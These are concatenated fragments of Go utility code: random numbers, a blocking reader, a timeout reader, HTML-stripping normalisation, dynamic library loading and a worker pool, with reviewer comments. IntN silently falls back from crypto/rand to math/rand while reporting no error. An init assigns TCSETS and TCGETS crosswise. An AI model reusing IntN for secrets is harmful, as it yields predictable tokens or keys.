| 3 | // Package raceutil reports if the Go race detector is enabled. 4 | package raceutil 5 | 6 | // Enabled reports if the race detector is enabled. 7 | const Enabled = true 8 | -------------------------------------------------------------------------------- /utils/putils/rand/number.go: -------------------------------------------------------------------------------- 1 | package rand 2 | 3 | import ( 4 | "crypto/rand" 5 | "errors" 6 | "math/big" 7 | crand "math/rand" 8 | ) 9 | 10 | // IntN returns a uniform random value in [0, max). It errors if max <= 0. 
// NOTE(review): the value is normally drawn from crypto/rand. If that source
// reports an error, the function silently falls back to math/rand and still
// returns a nil error, so the caller cannot tell that the result came from a
// non-cryptographic generator. Do not use IntN for tokens, keys or anything
// else that must be unpredictable unless that fallback is acceptable.
func IntN(max int) (int, error) {
	if max <= 0 {
		return 0, errors.New("max can't be <= 0")
	}

	limit := big.NewInt(int64(max))
	picked, err := rand.Int(rand.Reader, limit)
	if err == nil {
		return int(picked.Int64()), nil
	}

	// Best-effort fallback kept from the original: the crypto/rand error is
	// dropped and a math/rand value is returned instead.
	return crand.Intn(max), nil
}
// FrozenReader is a reader whose Read call blocks for math.MaxInt32 seconds
// (roughly 68 years) before reporting io.EOF, so for practical purposes it
// never returns.
type FrozenReader struct{}

// Read ignores p, sleeps for math.MaxInt32 seconds and then returns 0 and
// io.EOF. The sleep cannot be interrupted, so a goroutine blocked here stays
// blocked until the process exits.
func (reader FrozenReader) Read(p []byte) (n int, err error) {
	const forever = math.MaxInt32 * time.Second
	time.Sleep(forever)
	return 0, io.EOF
}
func init() {
	// NOTE(review): the names look crossed. The package variable TCSETS
	// receives the "get" request constant and TCGETS receives the "set" one;
	// values_darwin.go follows the same pattern with TIOCGETA/TIOCSETA.
	// Whether this is a bug depends on how the ioctl callers use the two
	// variables, which is not visible here. Confirm against those callers
	// before swapping anything.
	TCSETS, TCGETS = syscall.TCGETS, syscall.TCSETS
}
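// buffer p, giving up after Timeout.
//
// Read forwards to the wrapped Reader. When Timeout is zero or negative there
// is nothing to wait for, so the call is made directly and blocks as long as
// the wrapped Reader does. Otherwise the wrapped Read runs in its own
// goroutine and Read returns (0, ErrTimeout) if no result arrives in time.
//
// The wrapped Read cannot be cancelled. After a timeout its goroutine keeps
// running until the underlying call returns and may still write into p at
// that point, so the caller must not reuse p for anything else while such a
// read can be outstanding. Whatever that late read delivers is discarded.
func (reader TimeoutReader) Read(p []byte) (n int, err error) {
	// Without a positive timeout the original left ctx nil and panicked on
	// ctx.Done(); treat it as "no deadline" instead.
	if reader.Timeout <= 0 {
		return reader.Reader.Read(p)
	}

	ctx, cancel := context.WithTimeout(context.Background(), reader.Timeout)
	defer cancel()

	type readResult struct {
		n   int
		err error
	}
	// Capacity 1 lets the goroutine deliver its result and exit even when
	// nobody is receiving any more (the timeout path). The result travels
	// through the channel rather than through the named return values, which
	// the goroutine would otherwise write after Read has already returned.
	done := make(chan readResult, 1)
	go func() {
		rn, rerr := reader.Reader.Read(p)
		done <- readResult{n: rn, err: rerr}
	}()

	select {
	case <-ctx.Done():
		return 0, ErrTimeout
	case res := <-done:
		return res.n, res.err
	}
}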
// NormalizeWithOptions applies the transformations enabled in options to data
// and returns the result. The steps always run in this fixed order: trim
// surrounding whitespace, lowercase, uppercase, strip HTML.
//
// Consequences of that order:
//   - when both Lowercase and Uppercase are set, the uppercase step runs last
//   - trimming happens before tags are removed, so whitespace that only
//     becomes leading or trailing once the markup is gone is kept
//
// HTML stripping goes through the package-level HTMLPolicy, which this file
// initialises with bluemonday.StrictPolicy(). HTMLPolicy is an exported,
// mutable variable: replacing it changes the output for every caller in the
// process. The result is meant for HTML contexts only and does not replace
// context-specific escaping elsewhere.
func NormalizeWithOptions(data string, options NormalizeOptions) string {
	steps := []struct {
		enabled bool
		apply   func(string) string
	}{
		{options.TrimSpaces, strings.TrimSpace},
		{options.Lowercase, strings.ToLower},
		{options.Uppercase, strings.ToUpper},
		// Wrapped in a closure so HTMLPolicy is only touched when the step runs.
		{options.StripHTML, func(s string) string { return HTMLPolicy.Sanitize(s) }},
	}

	out := data
	for _, step := range steps {
		if step.enabled {
			out = step.apply(out)
		}
	}
	return out
}
// LoadLibrary loads the shared library identified by name and returns its
// handle. It delegates to the loadLibrary variant selected by build tags:
// purego.Dlopen with RTLD_NOW|RTLD_GLOBAL on darwin/linux (except 386 and
// arm, where the call always fails with "not implemented") and
// windows.LoadLibrary on Windows.
//
// name reaches the operating system loader unmodified. A bare or relative
// name is resolved through the loader's own search path, so callers should
// pass an absolute path or a fixed, trusted name and never a value that
// outside input can influence.
func LoadLibrary(name string) (uintptr, error) {
	handle, err := loadLibrary(name)
	return handle, err
}
// GetOSVendor returns the operating system vendor. This non-Linux build has
// no distribution lookup and returns runtime.GOOS.
func GetOSVendor() string {
	vendor := runtime.GOOS
	return vendor
}

// getPlatformMetadata returns "GOOS|GOARCH" encoded with standard base64,
// with a trailing "==" removed. Only two-character padding is stripped; an
// encoding that ends in a single "=" keeps it, so the result is not a
// consistently unpadded form.
func getPlatformMetadata() string {
	platform := strings.Join([]string{runtime.GOOS, runtime.GOARCH}, "|")
	encoded := base64.StdEncoding.EncodeToString([]byte(platform))
	return strings.TrimSuffix(encoded, "==")
}
// Pool is a task pool: an ants worker pool paired with the wait group used
// to block until work has finished.
type Pool struct {
	// PoolWithFunc is the ants pool used as the task queue.
	PoolWithFunc *ants.PoolWithFunc
	// Wg is the wait group callers block on.
	Wg *sync.WaitGroup
}

// NewPool instantiates a Pool with a fresh wait group. PoolWithFunc is left
// nil and has to be assigned by the caller before the pool is used.
func NewPool() *Pool {
	p := new(Pool)
	p.Wg = new(sync.WaitGroup)
	return p
}